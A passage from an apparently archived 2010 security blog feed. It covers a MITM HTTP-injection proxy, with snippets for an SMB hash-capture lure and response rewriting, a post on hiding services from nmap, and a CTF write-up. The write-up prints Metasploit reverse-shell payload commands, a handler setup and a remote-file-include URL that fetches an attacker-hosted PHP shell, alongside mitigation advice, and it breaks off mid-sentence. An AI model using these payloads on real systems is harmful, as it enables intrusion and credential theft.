most popular probably being &lt;a class="reference external" href="http://en.wikipedia.org/wiki/ARP_spoofing"&gt;ARP poisoning&lt;/a&gt;, but Ettercap has a number
to choose from). However, once we have our MITM attack working, we are
still presented with the problem of injecting our content into the HTML
file.&lt;/p&gt;
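&lt;p&gt;As described above, the injected lure just has to reference a file on the attacker's SMB server; a hidden element with a UNC-style file:// source is enough to make the browser authenticate automatically. A minimal sketch (the address and share name here are made up):&lt;/p&gt;

```python
# Hypothetical attacker address and share; the browser fetches the
# "image" over SMB and leaks the user's challenge hashes in the process.
ATTACKER = "192.168.1.100"

def smb_lure(host=ATTACKER):
    # Invisible image pointing at a share on the attacker's box.
    return '<img src="file://%s/share/x.jpg" style="display:none">' % host
```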
&lt;p&gt;In all the &lt;a class="reference external" href="http://hackarandas.com/blog/2010/01/28/ettercap-metasploit-helping-the-aurora-attack/"&gt;examples&lt;/a&gt; I have seen, the attack used Ettercap filters to
do this injection, or an email with embedded HTML. Unfortunately,
neither is very reliable. All the filters that I tried corrupted the
pages in the best case; in the worst case, they prevented the victim
from accessing certain servers entirely, as the attack would try to
kill gzip support on servers that required it. Obviously, this kind of
degradation would be noticed even by the common computer user. As for
the email, you still generally need to trick the user into viewing it
before the attack will work. Not incredibly hard, but slower and still
less reliable than a forced HTML injection.&lt;/p&gt;
&lt;p&gt;After looking through some Wireshark captures, it seemed that the root
problem in the Ettercap method was that the HTTP content length wasn't
being modified, confusing the browser when it got more data than it was
expecting. While it was probably possible to work around that in the
same way the gzip compression was broken, it wouldn't solve the
heart of the problem: trying to modify HTTP traffic at the TCP
level is neither effective nor powerful.&lt;/p&gt;
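&lt;p&gt;Concretely, the fix is to operate on complete HTTP responses rather than raw TCP segments: inject into the body, then recompute Content-Length before forwarding. A simplified sketch of the idea (not Sergio's actual code, and ignoring chunked or compressed responses):&lt;/p&gt;

```python
def inject_html(response, injection):
    # Split the raw response into headers and body at the blank line.
    head, _, body = response.partition(b"\r\n\r\n")
    # Inject our content just before the closing body tag.
    body = body.replace(b"</body>", injection + b"</body>", 1)
    # Rewrite Content-Length so the browser expects the new size.
    lines = []
    for line in head.split(b"\r\n"):
        if line.lower().startswith(b"content-length:"):
            line = b"Content-Length: %d" % len(body)
        lines.append(line)
    return b"\r\n".join(lines) + b"\r\n\r\n" + body
```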
&lt;p&gt;Enter Sergio. It was obvious that what I was looking for was a forced,
transparent HTTP proxy. I looked at some other proxies, and I probably
could have adapted them to my purposes pretty easily. However, I decided
I would rather code one myself, both to get familiar with the inner
workings of these tools and to let myself do everything in Python. I
have also had my eye on the Twisted framework for a while, and figured
this would be the perfect opportunity to familiarize myself with it.&lt;/p&gt;
&lt;p&gt;To run this attack, all you need to do is run the included
start_smbchall.py file. However, Sergio isn't limited to provoking
SMB authentication attempts. It can inject, modify, and
delete any content going through a victim's HTTP sessions, meaning that
we can do much, much more with it than just this attack. In addition to
this SMB fun, just for kicks, I also implemented my version of the
classic Upsidedownternet :P . Beyond these implemented attacks, Sergio
makes it easy to insert some malicious Javascript, replace all the
links on the page with links to a malicious site, prevent the victim
from accessing any update sites, redirect them to malicious update sites
(more on this later), monitor/record all the traffic going over the
connection, or (a fun one) replace any exe file being downloaded with
our own, backdoored, malicious executable. Unfortunately, I haven't
gotten a chance to actually implement these attacks yet (lame), but I'll
have a release soon enough with them included.&lt;/p&gt;
&lt;p&gt;Anyway, now that you know the capabilities, here's how to use it. I
promise, it's easy. You'll only need two files, start_proxy.py and
UserMITM.py, and the module sergio_proxy installed somewhere in your
PYTHONPATH (when in doubt, just throw it in a subdirectory named
sergio_proxy). Example start_proxy and UserMITM files are included in
the tarball in the examples folder. Basically, you just create a
subclass of the included MITM class in UserMITM and add your own attacks
into it. Then, when creating and starting your transparent proxy, you
set UserMITM as transparent_proxy's new MITM instance, and you're ready
to go. Pretty straightforward.&lt;/p&gt;
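&lt;p&gt;The pattern looks roughly like this; the class and method names below are illustrative guesses rather than Sergio's exact API, so check the bundled examples for the real signatures:&lt;/p&gt;

```python
# Sketch of the subclass-and-override pattern described above.
class MITM(object):
    def handle_response(self, data):
        return data  # base behavior: pass traffic through untouched

class UserMITM(MITM):
    def handle_response(self, data):
        # Your attack logic: rewrite the response body however you like.
        return data.replace(b"</body>",
                            b"<script>alert(1)</script></body>")
```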
&lt;p&gt;If you want to know more about what my proxy does and does not do, read
the README. Here's the short of it though: does HTTP 1.0, does not do
1.1 (yet), does not MITM HTTPS (yet). Sorry if this is disappointing,
but they weren't critical to my initial attack, and I will of course get
these things fixed ASAP.&lt;/p&gt;
&lt;p&gt;So that's Sergio Proxy. I could talk more, but it's probably easier for
you to just download it and mess around. And please, if you implement
some attacks with it, submit them! I'd be happy to add them in. As I
mentioned earlier, I should be back in a few days with an interesting
application of my tool. Until then, keep hacking.&lt;/p&gt;
</summary><category term="arp"></category><category term="ettercap"></category><category term="halflmchall"></category><category term="http"></category><category term="mitm"></category><category term="sergio"></category><category term="smb"></category></entry><entry><title>Hiding Services from Nmap Using Non-Standard Ports</title><link href="https://spareclockcycles.org/2010/05/14/hiding-services-from-nmap.html" rel="alternate"></link><updated>2010-05-14T21:28:00-04:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2010-05-14:2010/05/14/hiding-services-from-nmap.html</id><summary type="html">&lt;p&gt;Most system administrators know that using non-standard ports for some
services can be a useful way to hide ports from both automated attacks
and less determined attackers. In addition, it is also a good way to
lower the profile of an important host on your network, as an initial
portscan of what is actually an important host might report nothing
particularly attractive to an attacker if the services are using
non-standard ports. But how should one go about choosing a non-standard
port to use? Is one better than another?&lt;/p&gt;
&lt;p&gt;As some may know, &lt;a class="reference external" href="http://nmap.org/"&gt;nmap&lt;/a&gt;, which is easily the most popular port
scanning tool out there, will by default not scan all the ports on a
system, as this is *very* slow and *very* noisy. Instead, nmap uses
statistics gathered by the nmap developers to determine which ports will
most likely be open on any given host, thereby greatly increasing the
likelihood that a scan of 1000 ports will yield all the open ports on a
system. While this is great for increasing scan speed and decreasing
visibility, it brings with it a downside: that individuals wishing to
hide ports can more easily hide from port scans if they wish to.&lt;/p&gt;
&lt;p&gt;The statistics that nmap uses to determine common services are stored in
an included &amp;quot;nmap-services&amp;quot; file. I have written a small script
(&lt;a class="reference external" href="https://spareclockcycles.org/downloads/code/find-ports.tar.gz"&gt;available here&lt;/a&gt;) that parses this file and provides a list of ports
in a provided range that are not included in the file. Any of these
ports will, therefore, not be revealed to an attacker unless they
already know the port number from other research they did on the host,
or unless they waste the time and take the risk of performing a full
scan of all 65,535 ports.&lt;/p&gt;
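&lt;p&gt;The heart of that script is just parsing nmap-services and taking a set difference. A minimal version (assuming the file's standard "name port/proto frequency" line format) might look like:&lt;/p&gt;

```python
def unlisted_ports(services_path, lo=1, hi=65535):
    # Collect every TCP port that appears in nmap-services...
    listed = set()
    with open(services_path) as f:
        for line in f:
            line = line.strip()
            if not line or line.startswith("#"):
                continue
            port, proto = line.split()[1].split("/")
            if proto == "tcp":
                listed.add(int(port))
    # ...and return everything in the requested range that isn't listed.
    return sorted(set(range(lo, hi + 1)) - listed)
```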
&lt;p&gt;As an example, I started with a host that had port 80 (http) open and
port 22 (ssh) open. This host, to an attacker performing a port scan of
a network, could look rather tempting. Both ssh servers and http servers
are interesting services, and could attract unwanted attention. In
addition, these servers (especially ssh) are magnets for brute force
attacks, filling up logs with tons of uninteresting garbage, making it
hard to track the actually important information. Here is a screen shot
of our example host:&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="https://spareclockcycles.org/wp-content/uploads/2010/05/before-changing-ports.png"&gt;&lt;img alt="Oh look! A target!" src="https://spareclockcycles.org/wp-content/uploads/2010/05/before-changing-ports-300x175.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Using my tool, we can find other ports for these services to use that
nmap won't easily find. I chose 242 for ssh and 8079 for http-alt, but
the choice was arbitrary.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="https://spareclockcycles.org/wp-content/uploads/2010/05/looking-for-new-ssh-port.png"&gt;&lt;img alt="So many to chose from!" src="https://spareclockcycles.org/wp-content/uploads/2010/05/looking-for-new-ssh-port-300x168.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="https://spareclockcycles.org/wp-content/uploads/2010/05/looking-for-new-httpalt-port.png"&gt;&lt;img alt="So many to chose from...again!" src="https://spareclockcycles.org/wp-content/uploads/2010/05/looking-for-new-httpalt-port-300x168.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Ok, so now we just edit the configuration file for the respective
services, restart them, and voila, we are invisible! Well, you know,
almost.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="https://spareclockcycles.org/wp-content/uploads/2010/05/after-ports-changed-standard.png"&gt;&lt;img alt="You can't see me! :P" src="https://spareclockcycles.org/wp-content/uploads/2010/05/after-ports-changed-standard-300x168.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="https://spareclockcycles.org/wp-content/uploads/2010/05/after-port-change-more-thorough.png"&gt;&lt;img alt="You still can't see me! :P" src="https://spareclockcycles.org/wp-content/uploads/2010/05/after-port-change-more-thorough-300x168.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="https://spareclockcycles.org/wp-content/uploads/2010/05/after-port-change-complete.png"&gt;&lt;img alt="You can see me...with enough time." src="https://spareclockcycles.org/wp-content/uploads/2010/05/after-port-change-complete-300x168.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;As you can see, an attacker will be forced to perform an exhaustive scan
of the system to gain any useful information. Our two ports, 242 and
8079, only show up when we force nmap to scan every port on the system,
which is definitely not fast or quiet, and many IDSes will detect this
complete scan.&lt;/p&gt;
&lt;p&gt;Now, obviously, this is not the solution to all your security problems.
If you have an outward-facing HTTP server, people need to know the port
to access it, so no matter what port it's on, an attacker will be able
to find it. However, if your service only needs to be reachable by a
very limited number of people, but is important enough to attract
attacks (like ssh or http), then using a non-standard port could make
sense, and this method will make your important services basically
invisible to all but the most determined attackers.&lt;/p&gt;
&lt;p&gt;As always, any bugfixes or suggestions are definitely welcome. Enjoy!&lt;/p&gt;
</summary><category term="hacking"></category><category term="nmap"></category><category term="nonstandard ports"></category><category term="port scanning"></category><category term="system administration"></category></entry><entry><title>Offensive Security's HSIYF Competition Results Released</title><link href="https://spareclockcycles.org/2010/05/12/offensive-securitys-hsiyf-competition-results-released.html" rel="alternate"></link><updated>2010-05-12T17:33:00-04:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2010-05-12:2010/05/12/offensive-securitys-hsiyf-competition-results-released.html</id><summary type="html">&lt;p&gt;The &lt;a class="reference external" href="http://www.information-security-training.com/news/hsiyf-1-tournament-results/"&gt;final contest results&lt;/a&gt; were announced today, so I have opened up
&lt;a class="reference external" href="https://spareclockcycles.org/2010/05/10/how-i-beat-the-offensive-security-challenge/"&gt;my documentation of the event&lt;/a&gt; for all to read. Congrats to Vadium
(&lt;a class="reference external" href="http://www.information-security-training.com/documentation/04-vadium.pdf"&gt;docs&lt;/a&gt;) and Woff
(&lt;a class="reference external" href="http://www.information-security-training.com/documentation/06-woff.pdf"&gt;docs&lt;/a&gt;),
you guys definitely deserved it!&lt;/p&gt;
&lt;p&gt;I was a little disappointed with my results personally, but 24th out of
~1000 isn't bad I guess for losing a day plus some to moving, as well as
not being as focused on it as I should have been. Hopefully the next one
will be scheduled when I don't have to hack and pack up half my worldly
possessions at the same time :P .&lt;/p&gt;
</summary><category term="contest"></category><category term="offensive security"></category><category term="Pen Testing"></category></entry><entry><title>Offsec Challenge Post Password Protected</title><link href="https://spareclockcycles.org/2010/05/11/offsec-challenge-post-password-protected.html" rel="alternate"></link><updated>2010-05-11T01:21:00-04:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2010-05-11:2010/05/11/offsec-challenge-post-password-protected.html</id><summary type="html">&lt;p&gt;Hi all,&lt;/p&gt;
&lt;p&gt;Just wanted to let everyone know that although I have posted my
challenge report, it will be password protected from now until the
judging of the entries has been completed. This is simply to protect
myself from having my solutions stolen, although I would hope that no
one would need to do this. I will post an update when the final results
come in, and release the challenge report from password protection.&lt;/p&gt;
&lt;div class="line-block"&gt;
&lt;div class="line"&gt;Until then,&lt;/div&gt;
&lt;div class="line-block"&gt;
&lt;div class="line"&gt;supernothing&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;EDIT 05/14/10: The &lt;a class="reference external" href="https://spareclockcycles.org/2010/05/12/offensive-securitys-hsiyf-competition-results-released/"&gt;results are in&lt;/a&gt;, and I have opened up &lt;a class="reference external" href="https://spareclockcycles.org/2010/05/10/how-i-beat-the-offensive-security-challenge/"&gt;my
documentation&lt;/a&gt; for all to read. Enjoy!&lt;/p&gt;
</summary><category term="contest"></category><category term="offensive security"></category><category term="Pen Testing"></category></entry><entry><title>How I Beat the Offensive Security Challenge</title><link href="https://spareclockcycles.org/2010/05/10/how-i-beat-the-offensive-security-challenge.html" rel="alternate"></link><updated>2010-05-10T16:59:00-04:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2010-05-10:2010/05/10/how-i-beat-the-offensive-security-challenge.html</id><summary type="html">&lt;p&gt;This weekend, &lt;a class="reference external" href="http://www.offensive-security.com"&gt;Offensive Security&lt;/a&gt; held a hacking competition (CTF
style), so of course I felt obliged to participate. After all, I
couldn't pass up an opportunity to get some good old fashioned hacking
in. So, I `svn update`d my trusty old Metasploit copy, grabbed a
significant quantity of alcoholic and caffeinated beverages, and got to
work.&lt;/p&gt;
&lt;p&gt;For those not familiar with the contest rules (which is basically anyone
who decided not to waste their first weekend of summer on their
computer), there were three machines that contestants were supposed to
analyze and compromise: the aptly named &amp;quot;n00bfilter&amp;quot;, &amp;quot;killthen00b&amp;quot;, and
&amp;quot;gh0st&amp;quot;. The following blog post documents the process I went through to
compromise all three systems, and what could have been done to prevent
these attacks by concerned system administrators. My apologies for the
length: it was a lot of work, so I have a lot to write about. My code
and screenshots of everything I did on killthen00b and gh0st can be
found &lt;a class="reference external" href="https://spareclockcycles.org/offsec-challenge.tar.gz"&gt;here&lt;/a&gt;. I would have had screens for the n00bfilter attack as
well, but the ops brought the servers down early. Oh well.&lt;/p&gt;
&lt;p&gt;Before I begin, I would like to give props to people who helped: my
girlfriend, for not killing me this weekend, my good friends
&lt;a class="reference external" href="http://duststorm.org"&gt;duststorm&lt;/a&gt; and &lt;a class="reference external" href="http://cirictech.com"&gt;ciric&lt;/a&gt; for letting me bounce ideas off them and for
forcing me to take breaks to eat, and all the mods of the event, for
putting up with my very consistent and annoying whining. You were just
as crucial to my success as my puny brain and the exploits themselves.
So yeah, thanks!&lt;/p&gt;
&lt;p&gt;Also, to everyone who participated with me in it, way to go. It was
awesome hacking with you guys. Always happy to meet smart people. Hope
to see you around soon!&lt;/p&gt;
&lt;p&gt;So now, with my thank yous out of the way, we can get to the good
stuff...&lt;/p&gt;
&lt;div class="line-block"&gt;
&lt;div class="line"&gt;For all my exploits, the following tools were used:&lt;/div&gt;
&lt;div class="line-block"&gt;
&lt;div class="line"&gt;Nmap, Metasploit, Google, Python, Tamper Data, and my brain.&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="the-n00bfilter"&gt;
&lt;h2&gt;The N00bfilter&lt;/h2&gt;
&lt;div class="section" id="how-i-exploited-it"&gt;
&lt;h3&gt;How I Exploited It&lt;/h3&gt;
&lt;p&gt;This machine, though quite easy to hack, took me the longest out of all
of them. Why? Because, unfortunately, many others couldn't pass up the
opportunity to hack stuff either I guess. And there were apparently a
lot of noobs in that group. But more on that later.&lt;/p&gt;
&lt;p&gt;I woke up around 9 CST, which was when the contest was scheduled to
begin. I got my confirmation email, and got to work. First, I nmap'd the
box (slowly, so as to not trip the IDS), and determined that ports 22
and 80 were open. Bringing up the page, I was greeted with a simple
login screen. Reading the source of this page gave nothing obvious away.
After doing this, I of course sent the string &amp;quot;';-- just to see if maybe
my job might simply be that easy. Of course, it wasn't. I was greeted
with a mocking &amp;quot;HAHAHA!&amp;quot; message. After this, I tried &amp;quot;admin:admin&amp;quot; as a
login, and was told that I was a lazy illegitimate child and that I
should get back to work.&lt;/p&gt;
&lt;p&gt;WARNING: It's at this part of the story that I start getting annoyed.
Having recently switched to Chrome, I assumed that its view source
function would work identically to Firefox's: it would simply display
the exact source that it had used to render the page. How wrong I
was...for god knows what reason, Chrome actually reloads the page
(without preserving POST params) and displays that instead. Well, I
definitely noticed that it was a different page (it was exactly the same
as the &amp;quot;admin:admin&amp;quot; result page), but I lazily tacked looking up the
true source in Firefox on the end of my TODO list rather than opening it
up then, which cost me a good hour of my time flailing around, getting
basically nothing.&lt;/p&gt;
&lt;p&gt;Once I finally got back to looking at this page, it was 11 o'clock. I
found that the page's source structure was significantly different from
the normal failed login page, and that it seemed to have been generated
by some sort of web firewall made by Applicure called dotDefender. With
some quick google-fu, I found a very recent vulnerability in their
software that allows for remote system command execution for authorized
users. So in other words: get a login, get code execution.&lt;/p&gt;
&lt;p&gt;By this time however, the servers started getting pounded. And I know
muts, you could &amp;quot;access them fine&amp;quot;. But seriously, unless you guys had
banned the IPs of all my computers and my proxies for 8 hours straight,
there was some serious DoSing going down. In addition, people kept
changing the admin password to the application (which, by default, was
&amp;quot;password&amp;quot;), so every time I actually got the page to load, before I
could even get around to using my exploit, I'd get prompted for a
password, or the connection would die again. It literally took me a good
8 hours of watching loading bars before the load finally lightened up
enough that I got in, used the Tamper Data Firefox plugin to mess with
the POST parameters of a delete operation (as per the exploit) like I
had been planning since 11AM, and executed &amp;quot;find / -name n00bsecret.txt&amp;quot;
and &amp;quot;cat /opt/reallylongpaththatidontremember/n00bsecret.txt&amp;quot; to advance
to the next round.&lt;/p&gt;
&lt;p&gt;I know it's not your fault Offsec guys, I'm positive it was just a
combination of high load and stupid noobs pounding your IDS with
automated tools. It was just frustrating to have an exploit that I knew
exactly how to use, and not be able to. Maybe you can just get more
servers next time :D .&lt;/p&gt;
&lt;p&gt;UPDATE 05/12/10: The Offsec guys have just &lt;a class="reference external" href="http://www.information-security-training.com/news/offsec-hsiyf-report-part1/"&gt;posted a response&lt;/a&gt; to some
of the issues I raised here on their blog. The password was apparently
not necessary, as there was also a &lt;a class="reference external" href="http://www.information-security-training.com/documentation/dotdefender.js.txt"&gt;0-day XSS attack to be discovered&lt;/a&gt;
which, combined with the previous exploit, allowed for unauthenticated
exploitation. My bad on that one for not exploring it in more depth,
thank you for the explanation. As for not being able to simply access
the servers though, the explanation that everyone having these issues
must have been tripping the IDS simply does not hold water in my book,
but I guess arguing about it at this point is wasted breath.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="how-to-mitigate-the-risk"&gt;
&lt;h3&gt;How To Mitigate The Risk&lt;/h3&gt;
&lt;p&gt;This one was quite a serious vulnerability (remote code execution), but
would be pretty straightforward to prevent.&lt;/p&gt;
&lt;p&gt;For system administrators: update your software (especially security
software), and don't use easy to guess passwords like &amp;quot;password&amp;quot;. In
addition, try and make any error pages that are returned from software
similar to dotDefender look as similar as possible (if not identical) to
a normal failed login page, so that an unskilled attacker might not be
able to tell that it was an external application that blocked their
request. That measure alone would have made this vulnerability
significantly more difficult to find, as the error page would be less
noticeable.&lt;/p&gt;
&lt;p&gt;For those developing applications like dotDefender: don't put your
software name or even company name in the response. It's not helping you
advertise, I promise you, and it makes it easier for attackers to
identify your software. And as we all know, this is the first step to
exploitation. If you make the attackers' jobs easier, it will probably
hurt your reputation in the long run. Sysadmins, if it is possible for
you to disable this sort of identifying information, be sure to do so.&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="killthen00b"&gt;
&lt;h2&gt;Killthen00b&lt;/h2&gt;
&lt;div class="section" id="id1"&gt;
&lt;h3&gt;How I Exploited It&lt;/h3&gt;
&lt;p&gt;After finally getting through the giant, for lack of a better word,
clusterf*ck that was the n00bfilter, the going was much easier.&lt;/p&gt;
&lt;p&gt;I spent most of Saturday evening getting familiar with &lt;a class="reference external" href="http://netwinsite.com/surgemail/"&gt;Surgemail&lt;/a&gt;,
which was installed on the remote host to provide email services.
Initially, my plan was to find a way to get a user and password added
(or guess an existing one), and then use this to execute one of the
authenticated user remote exploits (&lt;a class="reference external" href="http://www.offensive-security.com/msf/surgemail_list.rb"&gt;there&lt;/a&gt; &lt;a class="reference external" href="http://aluigi.altervista.org/adv/surgemailz-adv.txt"&gt;were&lt;/a&gt; &lt;a class="reference external" href="http://www.milw0rm.com/exploits/5259"&gt;multiple&lt;/a&gt;) for
the installed version of Surgemail.&lt;/p&gt;
&lt;p&gt;However, this proved more difficult than I originally thought, as all
sign-up functions that I could find were disabled, no accounts had
account-recovery questions enabled, and users were not allowed to use
email accounts on different domains. This was a good move on the part of
the theoretical sysadmins. If any of these had been enabled, it would
have been simple to exploit the server using my method. However, after
two or three hours of probing through Surgemail docs, my own installed
Surgemail test setup in my VM, and looking through the remote install, I
couldn't find any obvious other way to get a valid user on the server
short of attempting a bruteforce. I decided to let it sit for awhile and
go hang out with some friends, and then sleep on it.&lt;/p&gt;
&lt;p&gt;I woke up the next morning refreshed and ready, and within the hour was
well on my way to System privileges. At the beginning of the
competition, we were given FTP credentials for this server. I had only
checked briefly to make sure they worked when I first nmap'd the server
and saw the FTP port, instead focusing on my Surgemail approach. I
decided to probe a little more into the FTP setup, and quickly found
that it had been mis-configured to allow access to and modification of
the entire filesystem. WIN.&lt;/p&gt;
&lt;p&gt;After this, my thorough exploration of the Surgemail system came in
handy, as I remembered noticing that any executable in the /scripts/
directory would automatically be executed upon access, no questions
asked. I had previously hoped that I could get it to execute programs
outside the /scripts/ directory, but now that I could put things into
that directory instead, I didn't need to climb that mountain. For fun, I
decided to try out Metasploit's fancy new reverse_tcp_dns meterpreter
module, and used the following command to generate my exploit:&lt;/p&gt;
&lt;p&gt;&lt;tt class="docutils literal"&gt;./msfpayload windows/meterpreter/reverse_tcp_dns LHOST=192.168.6.170 LPORT=7777 R | ./msfencode &lt;span class="pre"&gt;-t&lt;/span&gt; exe &lt;span class="pre"&gt;-e&lt;/span&gt; x86/shikata_ga_nai &lt;span class="pre"&gt;-o&lt;/span&gt; svchost.exe&lt;/tt&gt;&lt;/p&gt;
&lt;p&gt;I didn't feel like restarting my msfconsole as root (it takes forever
to load on my netbook), so I didn't use port 53, but had there been any
issue with IDS/IPS, this approach could probably have bypassed it. I
uploaded my malicious executable, browsed to
&lt;a class="reference external" href="http://192.168.6.70/scripts/svchost.exe"&gt;http://192.168.6.70/scripts/svchost.exe&lt;/a&gt;, and BAM, instant system
privileges. A quick search through the C:\Users\Administrator\Desktop
revealed the file I needed to get credit.&lt;/p&gt;
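&lt;p&gt;For reference, catching the callback on the attacking machine looks
roughly like this (a sketch from memory rather than my exact console
session; the payload, LHOST, and LPORT just need to match the msfpayload
command above):&lt;/p&gt;
&lt;pre class="literal-block"&gt;
msf &amp;gt; use exploit/multi/handler
msf exploit(handler) &amp;gt; set PAYLOAD windows/meterpreter/reverse_tcp_dns
msf exploit(handler) &amp;gt; set LHOST 192.168.6.170
msf exploit(handler) &amp;gt; set LPORT 7777
msf exploit(handler) &amp;gt; exploit
&lt;/pre&gt;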
&lt;p&gt;EDIT 05/12/10: Well, after reading Vadium's excellent documentation, it
turns out that it was not a mis-configured IIS FTP server, but instead
&amp;quot;Complete Ftp Server 3.3.0&amp;quot;, which has a directory traversal
vulnerability that I inadvertently rediscovered by trying to cd to C:/.
Not sure if I should feel smart or stupid about that...&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="id2"&gt;
&lt;h3&gt;How To Mitigate The Risk&lt;/h3&gt;
&lt;p&gt;Most obviously, &amp;quot;devil&amp;quot; should have been more careful with his/her
password. Protecting users from social engineering attacks through
education and good spam filtering is key to preventing these kinds of
leaks, as is strict password policy enforcement to prevent brute
force attacks.&lt;/p&gt;
&lt;p&gt;Beyond this, the configuration of FTP permissions was absolutely
unforgivable. It allowed an attacker that normally wouldn't have even
gotten code execution to quickly get a remote system-level shell.
Administrators, lock down the permissions for any services that allow
user logins, so as to prevent a total compromise in the case of a single
user's account being broken into.&lt;/p&gt;
&lt;p&gt;As for the webmail server itself: it a.) should not have been running as
System unless absolutely necessary (which, I believe, it isn't in Server
2008...although Surgemail may be a legacy program and need it)
and b.) should have been much, much more careful about how it handles
executables.&lt;/p&gt;
&lt;p&gt;Side rant: Really, Netwin? In this day and age, is it necessary to have
a compiled executable serve HTML content? What advantage does this
provide over scripting languages that justifies the increased risk? And
why, in the name of all that is holy, would you not limit the
executables in the script directory to simply &amp;quot;webmail.exe&amp;quot; and
nothing else? There's no reason to allow the execution of anything else
in this directory.&lt;/p&gt;
&lt;p&gt;From a sysadmin's point of view, it's difficult to deal with this kind
of incompetence from developers, as you probably don't have time to pen
test every single detail of the applications you use. However,
attempting to tighten permissions in any directories that are web
accessible so that only administrators can access them, and more
importantly, write to them, would be advisable in this case. This would
have made an attack much more difficult, if not broken it altogether.&lt;/p&gt;
&lt;p&gt;Finally, even though I didn't exploit any of the authenticated user
vulnerabilities, that doesn't mean that other people didn't or wouldn't.
If I had wanted to, I could have used the ftp mis-configuration to give
myself an account and compromised the server that way. As with the
n00bfilter, software updates should be applied regularly so as to
mitigate the risk posed by these vulnerabilities.&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="the-gh0st"&gt;
&lt;h2&gt;The Gh0st&lt;/h2&gt;
&lt;div class="section" id="id3"&gt;
&lt;h3&gt;How I Exploited It&lt;/h3&gt;
&lt;p&gt;While this took a little less time for me than the n00bfilter (as it
wasn't, thankfully, getting DoS'd), it was definitely more challenging,
and arguably more frustrating. However, after a good 7-8 hours of work,
I prevailed in the end.&lt;/p&gt;
&lt;p&gt;At the beginning, I was stumped. An nmap scan revealed that only port 80
was open, and a port scan pivoted through killthen00b reported similar
results. In addition, the HTTP headers reported that the site was
running IIS, and the ASP file extensions seemed to agree.&lt;/p&gt;
&lt;p&gt;Thanks to some directory enumeration, I was quickly able to determine
that the /1/, /Sites/, and /iissamples/ directories were available in
addition to the obvious /index/ directory. /1/ appeared to be the most
interesting, as it was a simple, seemingly abandoned web form. All input
to the forms (both in the index and in /1/), however, seemed to be
sanitized correctly. After the first hour, the only slightly
interesting thing I had found was some obfuscated javascript (which was
really fun to trace) that added a taunting image to certain pages when
viewed.&lt;/p&gt;
&lt;p&gt;Finally though, I made some progress. I had been focusing on the /1/
directory for some time, as it looked promising as an avenue for attack.
My first break came from using more google-fu on one of the POST variable
names, which brought up links to &lt;a class="reference external" href="http://www.mariovaldez.net/software/sitefilo/"&gt;SiTeFiLo&lt;/a&gt;, a simple text-file-based
authentication mechanism. Oddly enough, the software was written in PHP,
but the login page claimed to be an ASP page. By this point, I was
starting to get curious what strange kind of setup this was, but I
decided that it was simply IIS with PHP installed. (Oh, how wrong I
was...). After my attempt to dump the slog_users.txt file yielded a
taunting &amp;quot;:P&amp;quot; in response, I decided to look for vulnerabilities in the
software. And sure enough, there was &lt;a class="reference external" href="http://osvdb.org/50711"&gt;a remote include vulnerability&lt;/a&gt;,
which allowed you to include a remote header.inc.php file. It was
finally time to get a shell!&lt;/p&gt;
&lt;p&gt;My first attempt, I am ashamed to admit, was to inject a metasploit
generated ASP file to get a remote meterpreter shell on the machine. As
smtx pointed out, I probably should have just done OS detection with
nmap and I would have known better. However, after getting banned for 5
minutes by the n00bfilter for doing that exact thing (albeit, at a
rather high speed setting), I decided to hold off on that the rest of
the competition. After all, it said it was IIS, right? :P&lt;/p&gt;
&lt;p&gt;After a few failed attempts, with no clear reason why they failed, I
decided to go with the simpler and less functional, but
almost-guaranteed-to-work, PHP shell. Using the php/reverse_php module,
I generated my header.inc.php file and uploaded it to the previously
compromised web server on killthen00b. Then, it was just a matter of
firing up my multi/handler and browsing to
&lt;a class="reference external" href="http://192.168.6.66/1/slogin_lib.inc.php?slogin_path=http://192.168.6.71/"&gt;http://192.168.6.66/1/slogin_lib.inc.php?slogin_path=http://192.168.6.71/&lt;/a&gt;.
Sure enough, I now had a shell. A linux shell...:P&lt;/p&gt;
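&lt;p&gt;Generating that header.inc.php was a one-liner much like the earlier
Windows payload (reconstructed from memory; the exact LHOST/LPORT values
here are just illustrative):&lt;/p&gt;
&lt;p&gt;&lt;tt class="docutils literal"&gt;./msfpayload php/reverse_php LHOST=192.168.6.170 LPORT=7777 R &amp;gt; header.inc.php&lt;/tt&gt;&lt;/p&gt;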
&lt;p&gt;That, I have to say, was a pleasant surprise. I checked my &amp;quot;id&amp;quot; and
found I was running as a member of the limited &amp;quot;www-data&amp;quot; account. So of
course, now it was time to get a privilege escalation attack to get me
my root shell.&lt;/p&gt;
&lt;p&gt;The first exploit I looked at involved a &lt;a class="reference external" href="http://www.h-online.com/open/news/item/Hole-in-the-Linux-kernel-allows-root-access-850016.html"&gt;NULL pointer dereference&lt;/a&gt;,
but Ubuntu (which this was, at least according to uname) has a default
mmap_min_addr of 65536. /proc/sys/vm/mmap_min_addr confirmed my
suspicions: that exploit was out.&lt;/p&gt;
&lt;p&gt;The next one I considered was from Tavis Ormandy, involving a &lt;a class="reference external" href="http://seclists.org/fulldisclosure/2010/Jan/251"&gt;reference
after free bug in fasync file descriptors&lt;/a&gt; that allowed for privilege
escalation. As far as I could tell without testing, the system seemed to
be vulnerable. I modified his PoC slightly, opening up &amp;quot;/bin/sh&amp;quot; instead
of &amp;quot;/bin/true&amp;quot; on success, compiled, and tried it out. No joy.&lt;/p&gt;
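&lt;p&gt;The modification itself was tiny: swapping out the binary launched in
the PoC's success path (paraphrased; the exact call in Tavis's code may
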